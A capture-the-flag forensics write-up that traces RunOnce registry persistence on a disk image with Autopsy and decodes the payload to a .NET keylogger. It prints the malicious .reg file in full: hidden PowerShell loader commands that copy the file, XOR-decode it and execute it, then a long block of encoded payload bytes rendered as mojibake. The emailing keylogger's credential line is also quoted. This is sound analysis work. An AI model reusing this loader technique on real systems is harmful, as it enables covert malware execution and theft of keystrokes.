Solution

We are provided with an archive file. Extracting the files inside it, we get a file named autopsy.db and another file named InfectedMachine.aut. If we search a bit online of what these files are, we will discover they are files used in the Autopsy tool, a forensic tool to investigate Images taken from other machines.

Downloading the tool and opening it, we choose Open Case and load the .aut file provided. Make sure both the .db and .aut files provided to you are in the same folder.
An error will appear in Autopsy trying to locate the .E01 file, where we can manually specify its location to resolve this issue.
After loading the files, Autopsy shows everything you might need from Mikey’s machine. Now what?

Well, the description made a reference to a persistent issue on Mikey’s machine and CMD windows poping up every time he reboots his machine. If you are not familiar with persistence on Windows machines, a very basic way of achieving persistence is using the Run and RunOnce registry keys. There, malware authors create registry keys and as values they provide commands. Every time the system reboots, these registry keys will run, allowing persistence.

Now, where do we find these keys?
These keys are - at least for the current user - in the location HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce. The specific tree can be found on the current user inside a file called NTUSER.dat:

alt text

The reason we used this file to be able to read the registry keys of the current user (Mikey) is because the file NTUSER.dat is responsible for storing information of a specific user account such as desktop settings, start menu configs, application preferences and registry settings.

Navigating to the specific path of the registry, we locate two very interesting registry keys:

alt text

The first command is: cmd.exe /c "powershell -windowstyle hidden $reg = gci -Path C:\ -Recurse *.reg ^| where-object {$_.length -eq 0x00002AE3} ^| select -ExpandProperty FullName -First 1; $bat = "%temp%\tmpreg.bat'; Copy-Item $reg -Destination $bat; ^& $bat;"
The second command is: cmd /c more +7 %temp%\tmpreg2.bat & %emp%\tmpreg2.bat

This explains the two popup CMD windows (since we have two startup cmd execution commands). What do these commands do though?

Basically, they try to locate a file that has a .reg extention and copies some of its data into a .bat file. Then, they skip the firsr 7 lines of the .bat file and execute a new .bat file contaning the rest of the code. It might not make a lot of sense, but all operations are oriented around the mysterious .reg file. Let’s locate that!

To do so, we have to navigate to Tools->File Search by Attributes and search for .reg:

alt text

Running the following command, we get back only 1 file with a .reg extention that also contains very suspicious data:

alt text

We can right click on the file and extract it for further analysis. The data inside the registry file are:

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"startup_entry"="cmd.exe /c \"powershell -windowstyle hidden $reg = gci -Path C:\\ -Recurse *.reg ^| where-object {$_.length -eq 0x00002AE3} ^| select -ExpandProperty FullName -First 1; $bat = '%temp%\\tmpreg.bat'; Copy-Item $reg -Destination $bat; ^& $bat;\""
"startup_entry2"="cmd /c more +7 %temp%\\tmpreg.bat > %temp%\\tmpreg2.bat & %emp%\\tmpreg2.bat"



cmd /c "powershell -windowstyle hidden $file = gc '%temp%\\tmpreg.bat' -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file^| select -Skip 000739)) -Encoding Byte; ^& $path;"
exit
:-ηwtwwwswwwˆˆwwΟwwwwwww7wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwχwwwyhΝywΓ~ΊVΟv;ΊV#WWWWWW38$WYzz}Swwwwwww'2ww;vtwςΎwwwwwwww—wUw|vGwwiwwwwwwwww=KwwwWwww7wwww7wwWwwwuwwswwwwwwwqwwwwwwwwχwwwuwwwwwwuwςwwgwwgwwwwgwwgwwwwwwgwwwwwwwwwwwLww8wwww7wwΫrwwwwwwwwwwwwwwwwwwwww{www·MwwkwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwWwwwwwwwwwwwwwWww?wwwwwwwwwwwYwww'kwwwWwwwiwwwuwwwwwwwwwwwwwwWwwYwwwΫrwww7wwwqwwwWwwwwwwwwwwwwww7ww7Yww{wwwwwwwuwwwQwwwwwwwwwwwwww7ww5wwwwwwwwwwwwwwww[Kwwwwww?wwwuwrwΛ\wwsxwwtwuwuwwqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwAwqwwq_twwqw]wwdGtwΏwwwvwwfwuvwws_xww}|p[zuvwwso_gww}wfww}}qTwwwwχ8E6eww}wqu‰qrwwqdww}cww}wq`bww}wq`aww}w\wa{\ w_vwwqz~`Y}~Wvχˆˆ‰v\v`dsfs[Bwuvwws``ww}druvwwso_gww}wfru_swwqoww}wfrnww}w\dw`/{Wˆwww‰sdqfqZμw`dp\ηdGtw~wwuwwfwvww}ti‰v|p[|tww}O;~wwth~‰v{[|fww}OO~wwthz‰vz~[|jww}OS~wwthd‰vdsfs[|Zww}Oy~wwthc‰vdrfr[|Jww}Owwthl‰vdqfq[|"ww}O•wwthW‰vdpfp[|ww}O»wwthV‰vdf[|ww}OΑwwthU‰vd~f~[|ςww}OΧwwthT‰vd}f}[|κww}OύwwthS‰vd|f|[|ήww}OwwthR‰vd{f{[|ΐww}O)wwthQ‰vdzfz[|΄ww}O?wwthP‰vdyfy[|Ίww}OEwwth_‰vdxfx[|ww}Okwwth[‰vdgfg[|œww}OqwwthZ‰vdfff[|~vw}O‡pwwthY‰vdefe[|lvw}O­pwwthG‰vddfd[|Zvw}O³pwwthF‰vdcfc[|Fvw}OΩpwwthE‰vdbfb[|Bvw}OοpwwthD‰vdafa[|Nvw}OυpwwthC‰vd`f`[|Jvw}OpwwthB‰vdofo[|6vw}O!pwwthA‰vdnfn[|2vw}O7pwwth@‰vdmfm[|>vw}O]pwwthO‰vdlfl[|:vw}OcpwwthN‰vdkfk[|&vw}O‰qwwth6‰vdjfj[|"vw}OŸqwwth5‰vdifi[|.vw}O¥qwwth4‰vdhfh[|*vw}OΛqwwth3‰vdWfW[|vw}OΡqwwth2‰vdVfV[|vw}Oηqwwth1‰vdUfU[|vw}O
qwwth0‰vdTfT[|vw}Oqwwth?‰vdSfS[|vw}O9qwwth>‰vdRfR[|vw}OOqwwth=‰vdQfQ[|vw}OUqwwth<‰vdPfP[|
vw}O{qwwth;‰vd_f_[|φvw}Orwwth:‰vd^f^[|ςvw}O—rwwth9‰vd]f][|ώvw}O½rwwth8‰vd\f\[|ϊvw}OΓrwwth'‰vd[f[[|ζvw}Oιrwwth&‰vdZfZ[|βvw}Orwwth%‰vdYfY[|ξvw}Orwwth$‰vdXfX[|κvw}O+rwwth#‰vdGfG[|Φvw}O1rwwth"‰vdFfF[|vw}OGrwwth!‰vdEfE[|ήvw}Omrwwth ‰vdDfD[|Ϊvw}Osrwwth/‰vdCfC[|Ζvw}O™swwth.‰vdBfB[|Βvw}O―swwth-‰vdAfA[|Ξvw}Oµswwth,‰vd@f@[|Κvw}OΫswwth+‰vdOfO[|Κvw}Oαswwth*‰vdNfN[|¦vw}Oχswwth‰vdMfM[|Zvw}Oswwth‰vdLfL[|Fvw}O#swwth‰vdKfK[|Bvw}OIswwth‰vdJfJ[|Nvw}O_swwth‰vdIfI[|Jvw}Oeswwth‰vdHfH[|6vw}O‹twwth‰vd7f7[|2vw}O‘twwth‰vd6f6[|>vw}O§twwth‰vd5f5[|:vw}OΝtwwth‰vd4f4[|&vw}OΣtwwth‰vd3f3[|¨vw}Oωtwwth‰vd2f2[|”vw}Otwwth‰vd1f1[|vw}Otwwth‰vd0f0[|œvw}O;twwth‰vd?f?[|˜vw}OAtwwth‰vd>f>[|„vw}OWtwwth‰vd=f=[|Švw}O}twwth‰vd<f<[|puw}Oƒuwwth‰vd;f;[|fuw}O©uwwth‰vd:f:[|luw}OΏuwwth‰vd9f9[|Ruw}OΕuwwth‰vd8f8[|Xuw}Oλuwwth ‰vd'f'[|Nuw}Oρuwwth‰vd&f&[|4uw}Ouwwth‰vd%f%[|:uw}O-uwwth
‰vd$f$[|.uw}O3uwwth‰vd#f#[|uw}OYuwwtWηwww‰vd"f"[|uw}ObuwwtWζwww‰vd!f![|πuw}O‹vwwtWΧwww‰vd f [|Τuw}O”vwwtWΦwww‰vd/f/[|Τuw}O½vwwtWΥwww‰vd.f.[|Δuw}OΖvwwtWΤwww‰vd-f-[|Δuw}OοvwwtWΣwww‰vd,f,[|¶uw}OvwwtWwww‰vd+f+[|¶uw}OvwwtWΜwww‰vd*f*[|Ίuw}O:vwwtWΝwww‰vd)f)[|¦uw}OCvwwtWΛwww‰vd(f([|œvw}OlvwwtWΚwww‰vdf[|vw}OuvwwtWΙwww‰vdf[|Άuw}OžwwwtW·www‰vdf[|®uw}O§wwwtWΘwww‰vdf[|uw}OΐwwwtW¶www‰vdf[|˜vw}OιwwwtWµwww‰vdf[|Άuw}OςwwwtW¬www‰vdf[–uw}\tW«www‰vdf[’uw}\.tWwww‰vdf[žuw}\4tW©www‰vdf[šuw}\ZtW•www‰vdf[†uw}\`žuwxv_mww}’uw_lww}}qd\wf]wwlGtw§wwwtwwfwwkww}}‚uwjww}|qdtwiww}hww}wqWww}htwVww}wq^tw_Uww}Tww}_Sww}Rww}wuvwws_xww}a‰vdsfs[u©uvwwsQww}{Pww}z_ww}wuvwws_^ww}wq~]ww}wpW<uww\ww}wpBtwtw[ww}Zww}wp`Yww}wpqXww}ww©qdrww©w]vgwwwwvwΏΎwq`wwv	uh__Gww}¬tw_Sww}
vwwsu_Fww}w]5$=5vwvwwwww{wwwCYGYDGDFNwwwwrwwwwοtwwT	wwsswwƒswwT$wwwwww‡twwT"$wŸ{wwgwwwT0">3www{ww{uwwT5wwwwwwwuwwv buc~wwwwvDwawwvwwwQwwwuwwwvwwwqwwwrwwwFwwwywwwtwwwvwwwvwwwvwwwuwwwww‹vvwwwwwqwvιtqw©vιtqwwtxwΙtwwqwΊwΌuqw#vΌuqwBvΌuqw²vΌuqwζvΌuqwέvΌuqw“wΌuqwΞwtqwΰwtqwovΌuqwˆw}uqw8sΑu}w?tPsqw9tgw}wtPs}w'wu}wsuqwstgwqw„uΑuqw+wgwqwΊtgw}wCtPsqw,tgwqwvwΑuqwQuΑu}wBsu}wuuqw–s#uqw¥sgsqwftgw}w5us}wΫssqwρsΑuΰwktwwwwwwpwwwwwvwvwwwgwΩu]t6wvwvwvwLugvwwwwχwαWwdvvw'Wwwwwζw±uovuwWwwwwφwκsqwtwCVwwwwφwΏsivtwΗ]wwwwφwόuTvswλ\wwwwρotqwqwwwvw7uwwvwŒtwwvw<wwwvw3wwwuwu~wtvwfwtqwnwt}w^wtgwFwtgwNwtgw6wtgw>wtgw&wtgw.wtgwwtbwwtgwwtgwwtgw¶w6sPw¶w«t[wώwtqwώwuDw¦wtOwώwDwIwώwsbwώwPwbwζwt3w®wζwgw®wwqw–wSuΞwžw?sΚwΦwtqwήwtgw†wtgwΦwΚu¦wΦwŠu wŽwTwgwvvεs«w~vwΞwžw?s•wΦw!sgwΖwtgwfvwΞwfvwqw¶wύwŸwΦwΘsgwήwΤsvwnvtšwήwws„wήwΧubwήwHww^vZuwvφwtqwYw|w]vYwdwDvYwlw%vYwTw,vYw\wvYwDwvYwLwvYw4w,vYw<wvYw$wvYw,wvYwwvYwwΕvYwwΘvmw=w³wβuwvtwwvwsχwwvwwwwwwwwwwwww]twwswwwwwwwwwwwpvmwwwwwswwwwwwwwwwwpvΑuwwwwwww>DEwK:Iw$Y>8ww6w(2w(2w$www::w1w(9w%;w4w06<$w3w w06w36w4!6w6#6w6#6w#1 6w61!6w646w636w4%6w6'6w646w646w%46w<;Yw$Y%Y!w#$w01'www9 4w$Y$Y'w(>w$Y9Y:w2wDEYw(2$w'w$w(1w:w$Y%w:64w2w(#w$%w#%w$1w<;w22?w#w$ w# wYw$Y3w$Y%Y>$w$Y%Y4$w3:w16w$6w226ww(4w$Y$Y4w$Y#w:6w2w4w8w($w$Y9w(6%w$4w2w04ww('w>45?w(5w<w4>w  >wwwwwvwz,w5wwww*ww|,w#w6w5w*wwx,w2wwwww*wwx,w'wwwww*ww`,w4wwwwWw;wwww*ww|,w2www*wwx,w$wwwww*wwd,w'wwwwWw"ww*ww`,w'wwwwWw3ww ww*ww|,w2www*wwz,w?wwww*ww|;wwww*ww~,w"ww*wwx,w%wwwww*wwz,w3ww ww*wwj,w'wwwwwWw$wwwwww*wwf,w>wwwwww*wwf,w3wwwwww*wwtGwwtFwwtEwwtDwwtCwwtBwwtAwwt@wwtOwwtNwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwt wwtwwtwwt
wwd,w wwwww ww*wwz,w;wwww*wwt]wwt\wwtZwvt[wwtXww~,w1wFw*ww~,w1wEw*ww~,w1wDw*ww~,w1wCw*ww~,w1wBw*ww~,w1wAw*ww~,w1w@w*ww~,w1wOw*ww~,w1wNw*ww|,w1wFwGw*ww|,w1wFwFw*ww|,w1wFwEw*wwb,w9wwwWw;wwww*wwl,w$wwwwwwWw;wwww*wwx,w$wwwww*wwz,w4wwww*ww|,w6www*wwtJwwtwvtYwwtPwvtLwwtΓwvt*wwt,wwt	wwt+wwjwwwwYwwwwwwYwwwww|wwwwww~wwwww|;wwwMwWwwDwwwwwDwGwCwCwDwEwDwCw7wwwwwwwwYwwwww!w?w=wwww1www
w9ww.ww9ww-w3w1ww-wFwNww:wDwww:w0www:w
w>wFw/wDw&w w/wDw>w
w-wEw.www3w:wFww&wJwJwwf+w;wwwYwwwwwwww½iY8<Θ|Ÿ‹ΌwsWvvtWwvrWvvffsWvvysWvvu{pe2uue>uuswvuyqwuvyfsWvvzrWuvkorWvverWuvyupyuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuytWwyqwtyyyy{pqe&e"e.yue*rWvvesWwe
rwweχφrwuyyyswvvyrWuvyyqWvveχζrWvve&qwvyfχξΐ
+!nC—ώuqyswvrwvvjysWvyqWuvke:vwwwwwwivwvw#ua 92# vvwpvwwwwyvw~<;wwrvwwww`vwe4WµήWWEGF@ww^vwSB@NNNFEZNGCZCDNZONEBZOGCNOFOCGww{vwpFYGYGYGww>vwmY92#1 [!JCYOvw#yc1 39eY92#W1 WCYOwwwwwwwςΎwwwwuwwwkvww«Mww«kww%$3$~ΠZΦ7Πω^…ΤG„vwww4M+"+(CB+3 +ZZ+<;+<;++3+<;YwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwWKwwwwwwwwwwMKwwwWwwwwwwwwwwwwwwwwwwwwww[Kwwwwwwwwwwww(42:wYwwwwwˆRwW7wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwuwgwwwWwwχowww'wwχwwwwwwwwwwwwwwvwvwwwOwwχwwwwwwwwwwwwwwvwwwwwχwwwwwwwwwwwwwwwwwvwvwwwwwχwwwwwwwwwwwwwwvwwwwwΫtwwη7wwktwwwwwwwwwwktCwww!w$w(w!w2w%w$w>w8w9w(w>w9w1w8wwwwwΚs˜‰wwvwwwvwwwwwwwvwwwwwHwwwwwwwswwwvwwwwwwwwwwwwwww3wwwvw!www1wwww>wwwwwwwwSwswww#wwwwwwwwwwwwwwwwwΗsuwwvw$wwwwww1wwww>wwwwww/uwwvwGwGwGwGwGwCwwGwwwmwvwvw4wwwwwwwwwwwwwwUwvwvw4wwwwwww9wwwwwwwwwwwwKw}wvw1wwww3wwwwwwwwwwwwwww<www;wwwwwwwwGwwvw1wwww!wwwwwwwwwwwFwYwGwYwGwYwGwwwKwywvw>wwwwwwww9wwwwww<www;wwwwwwYwwwwww?wewvw;wwwww4wwwwwwwwwww4wwwwwwwwwWwήwWwWwEwGwFw@www]wvwvw;wwwww#wwwwwwwwwwwwwwwwww3wywvw8wwwwwwww1wwwwwwwwww<www;wwwwwwYwwwwwwCw}wvw'wwwwwww9wwwwwwww<www;wwwwwwwwCwwvw'wwwwwww!wwwwwwwwwFwYwGwYwGwYwGwwwOwwvw6wwwwwwwwWw!wwwwwwwwwFwYwGwYwGwYwGwwwΛ4wwvwwwwwwwwww˜ΜΘKHWJUFYGUWJU"#1ZOUWJUUHIz}z}KWJUMZZMYFUW!JUFYGUIz}WWK>WJUFYGYGYGUWJU:6YUXIz}WWK>WJUMZZMYEUIz}WWWWKIz}WWWWWWK'WJUMZZMYDUIz}WWWWWWWWK2;WJU>UW6JUUXIz}WWWWWWKX'Iz}WWWWKXIz}WWKX>Iz}KXIwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwGww{www;Kwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

We notice that the command tries to read the file from a specific offset, then xor with the key 0x77 and then run the result that is stored as an executable.
By loading the .reg file onto Cyberchef and keeping only the bytes after the exit, if we xor with the byte 0x77 we will get the following executable:

alt text

Note: Copy and pasting bytes by hand might lead to invalid executable, so make sure to load the .reg file itself and then keep only the bytes you want to decrypt.

If we save this file and run the file command on it, we will see it is a Mono/.Net assembly:

└─$ file extracted.exe  
extracted.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

These files can be viewed with tools like DNSpy or ILSpy. I prefer ILSpy for static analysis, so I’ll go with that one.

Opening the file in ILSpy, we get that our program is a Keylogger! What it does in more details is it stores the users keystrokes, and sends them over as logs via email, with credentials being:

smtpClient.Credentials = new NetworkCredential("cafim30443234@arinuse.com", "VHJvamFuezNtYjNkZDFuZ19rM3lsMGdnMzI1X3QwX3IzZ2YxbDM1fQ==");

alt text

The password part seems kinda sus, so by decoding from base64, we finally get our flag!

>>> from base64 import b64decode
>>> b64decode(b"VHJvamFuezNtYjNkZDFuZ19rM3lsMGdnMzI1X3QwX3IzZ2YxbDM1fQ==")
b'Trojan{3mb3dd1ng_k3yl0gg325_t0_r3gf1l35}'